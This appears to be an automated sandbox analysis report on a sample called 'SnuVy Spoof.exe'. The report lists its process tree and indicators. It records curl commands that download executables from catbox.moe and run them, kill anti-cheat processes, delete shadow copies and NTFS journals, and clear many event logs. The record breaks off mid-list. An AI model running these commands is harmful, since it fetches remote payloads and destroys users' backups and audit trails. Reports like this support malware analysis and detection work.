PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 780	2192	msedge.exe	93
PID 2192 wrote to memory of 780	2192	msedge.exe	93
PID 2192 wrote to memory of 3708	2192	msedge.exe	94
PID 2192 wrote to memory of 3708	2192	msedge.exe	94
PID 2192 wrote to memory of 3708	2192	msedge.exe	94
PID 2192 wrote to memory of 3708	2192	msedge.exe	94
PID 2192 wrote to memory of 3708	2192	msedge.exe	94
PID 2192 wrote to memory of 3708	2192	msedge.exe	94

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

cURL User-Agent 5 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	67	curl/8.7.1
HTTP User-Agent header	70	curl/8.7.1
HTTP User-Agent header	75	curl/8.7.1
HTTP User-Agent header	32	curl/8.7.1
HTTP User-Agent header	65	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe
"C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start https://discord.gg/PSsPuPwU7E
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/PSsPuPwU7E
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x100,0x104,0x130,0x7ff8d17546f8,0x7ff8d1754708,0x7ff8d1754718
      4⤵
      PID:2396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
      4⤵
      PID:4508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2996 /prefetch:8
      4⤵
      PID:3708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
      4⤵
      PID:2844
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
      4⤵
      PID:2560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
      4⤵
      PID:4592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5440 /prefetch:8
      4⤵
      PID:732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5272 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:3408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
      4⤵
      PID:5024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:664
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff705325460,0x7ff705325470,0x7ff705325480
        5⤵
        
        PID:2256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,9649408331889987619,10352967905754690125,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2068
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SnuVy Spoof.exe" MD5
    3⤵
    PID:2052
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:1952
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/lndcmk.bin" -o %APPDATA%\ZRGHJR345.exe
  2⤵
  PID:4896
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/lndcmk.bin" -o C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    3⤵
    PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/dgmod9.rrs" -o %APPDATA%\XGEHIOPZE543.exe
  2⤵
  PID:5648
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/dgmod9.rrs" -o C:\Users\Admin\AppData\Roaming\XGEHIOPZE543.exe
    3⤵
    PID:5664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/2v89lz.bat" -o %APPDATA%\XHVUER764.bat
  2⤵
  PID:5712
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/2v89lz.bat" -o C:\Users\Admin\AppData\Roaming\XHVUER764.bat
    3⤵
    PID:5728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/xefma9.bin" -o %APPDATA%\y9cisa.exe
  2⤵
  PID:5776
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/xefma9.bin" -o C:\Users\Admin\AppData\Roaming\y9cisa.exe
    3⤵
    PID:5792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %temp% & curl -L "https://files.catbox.moe/z3o23v.dll" -o %APPDATA%\Guna.UI2.dll
  2⤵
  PID:5904
- - C:\Windows\system32\curl.exe
    curl -L "https://files.catbox.moe/z3o23v.dll" -o C:\Users\Admin\AppData\Roaming\Guna.UI2.dll
    3⤵
    PID:5920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:6020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\y9cisa.exe
  2⤵
  PID:6036
- - C:\Users\Admin\AppData\Roaming\y9cisa.exe
    C:\Users\Admin\AppData\Roaming\y9cisa.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:6052
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C wmic bios get serialnumber
      4⤵
      System Location Discovery: System Language Discovery
      PID:4952
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic bios get serialnumber
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:4964
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
  2⤵
  PID:4352
- - C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe
    3⤵
    - Executes dropped EXE
    PID:4840
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8E41.tmp\8E42.tmp\8E43.bat C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe"
      4⤵
      PID:4624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im EasyAntiCheat.exe
        5⤵
        Kills process with taskkill
        
        PID:1256
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im BEService_x64.exe
        5⤵
        Kills process with taskkill
        
        PID:2368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im EpicGamesLauncher.exe
        5⤵
        Kills process with taskkill
        
        PID:5012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
        5⤵
        Kills process with taskkill
        
        PID:3940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
        5⤵
        Kills process with taskkill
        
        PID:1520
    - - C:\Windows\system32\sc.exe
        
        sc stop BEService
        5⤵
        Launches sc.exe
        
        PID:4544
    - - C:\Windows\system32\sc.exe
        
        sc stop EasyAntiCheat
        5⤵
        Launches sc.exe
        
        PID:3336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Hardware Survey" /f
        5⤵
        
        PID:4736
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Identifiers" /f
        5⤵
        
        PID:2992
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games\Unreal Engine\Identifiers" /va /f
        5⤵
        
        PID:5292
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games\Unreal Engine\Hardware Survey" /va /f
        5⤵
        
        PID:3724
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
        5⤵
        
        PID:1940
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKU\S-1-5-21-860440266-1445122309-108474356-1001\Software\Epic Games" /f
        5⤵
        
        PID:3400
    - - C:\Windows\system32\reg.exe
        
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 22968 /f
        5⤵
        Modifies registry key
        
        PID:3480
    - - C:\Windows\system32\reg.exe
        
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 14475 /f
        5⤵
        Modifies registry key
        
        PID:4084
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
        5⤵
        
        PID:2984
    - - C:\Windows\system32\ARP.EXE
        
        arp -d
        5⤵
        
        PID:4740
    - - C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe
        
        "C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe"
        5⤵
        Executes dropped EXE
        
        PID:4508
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A8CE.tmp\A8CF.tmp\A8DF.bat C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe"
        6⤵
        
        PID:1796
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3392
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4972
        
        C:\Windows\system32\PING.EXE
        
        ping /n 1 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3456
        
        C:\Windows\system32\PING.EXE
        
        ping /n 2 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5220
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2720
    - - C:\Users\Admin\AppData\Roaming\ddc.exe
        
        C:\Users\Admin\AppData\Roaming\ddc.exe b /target:c:\DriverBackup4u
        5⤵
        Executes dropped EXE
        Checks system information in the registry
        System Location Discovery: System Language Discovery
        
        PID:5576
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        5⤵
        
        PID:5624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start "" /wait /b "C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe""
        5⤵
        
        PID:5620
      - C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe
        
        "C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        5⤵
        
        PID:2420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" start "" /wait /b "C:\Users\Admin\AppData\Roaming\Cleaner8.exe""
        5⤵
        
        PID:4484
      - C:\Users\Admin\AppData\Roaming\Cleaner8.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner8.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Drops desktop.ini file(s)
        Drops file in System32 directory
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:5672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d C:
        7⤵
        
        PID:4312
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d C:
        8⤵
        Deletes NTFS Change Journal
        
        PID:5844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d D:
        7⤵
        
        PID:5852
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d D:
        8⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:5832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d E:
        7⤵
        
        PID:5932
        
        C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d E:
        8⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:5928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        7⤵
        
        PID:5904
        
        C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /All /Quiet
        8⤵
        Interacts with shadow copies
        
        PID:5996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net stop winmgmt /Y
        7⤵
        
        PID:3896
        
        C:\Windows\system32\net.exe
        
        net stop winmgmt /Y
        8⤵
        
        PID:5072
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop winmgmt /Y
        9⤵
        
        PID:4296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pause
        7⤵
        
        PID:3952
    - - C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe"
        5⤵
        Executes dropped EXE
        
        PID:2672
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1330.tmp\1331.tmp\1332.bat C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe"
        6⤵
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit
        7⤵
        
        PID:5040
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit
        8⤵
        
        PID:5168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wevtutil.exe el
        7⤵
        
        PID:5144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        8⤵
        
        PID:5124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AMSI/Debug"
        7⤵
        
        PID:5164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AirSpaceChannel"
        7⤵
        
        PID:2656
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Analytic"
        7⤵
        
        PID:5412
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Application"
        7⤵
        
        PID:6124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowFilterGraph"
        7⤵
        
        PID:6132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowPluginControl"
        7⤵
        
        PID:6056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Els_Hyphenation/Analytic"
        7⤵
        
        PID:6036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "EndpointMapper"
        7⤵
        
        PID:4356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "FirstUXPerf-Analytic"
        7⤵
        
        PID:5208
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "ForwardedEvents"
        7⤵
        
        PID:980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "General Logging"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "HardwareEvents"
        7⤵
        
        PID:3568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "IHM_DebugChannel"
        7⤵
        
        PID:5512
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
        7⤵
        
        PID:236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
        7⤵
        
        PID:3472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
        7⤵
        Clears Windows event logs
        
        PID:5228
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
        7⤵
        
        PID:5244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
        7⤵
        
        PID:5260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Internet Explorer"
        7⤵
        
        PID:2088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Key Management Service"
        7⤵
        
        PID:4496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
        7⤵
        
        PID:5300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
        7⤵
        
        PID:5316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationFrameServer"
        7⤵
        
        PID:5336
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProc"
        7⤵
        
        PID:5352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProcD3D"
        7⤵
        
        PID:1116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationAsyncWrapper"
        7⤵
        
        PID:3732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationContentProtection"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDS"
        7⤵
        
        PID:4388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDeviceProxy"
        7⤵
        
        PID:2808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMP4"
        7⤵
        
        PID:1620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMediaEngine"
        7⤵
        
        PID:2220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformance"
        7⤵
        
        PID:4676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformanceCore"
        7⤵
        
        PID:1488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPipeline"
        7⤵
        
        PID:2592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPlatform"
        7⤵
        
        PID:4628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationSrcPrefetch"
        7⤵
        
        PID:2480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
        7⤵
        
        PID:1560
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Admin"
        7⤵
        
        PID:2368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Debug"
        7⤵
        
        PID:4004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Operational"
        7⤵
        Clears Windows event logs
        
        PID:2676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
        7⤵
        
        PID:4492
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
        7⤵
        
        PID:3028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-License-Flexible-Platform/Admin"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-License-Flexible-Platform/Debug"
        7⤵
        Clears Windows event logs
        
        PID:2416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-License-Flexible-Platform/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:1552
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
        7⤵
        
        PID:4848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
        7⤵
        
        PID:2108
        
        C:\Windows\system32\wevtutil.exe
        
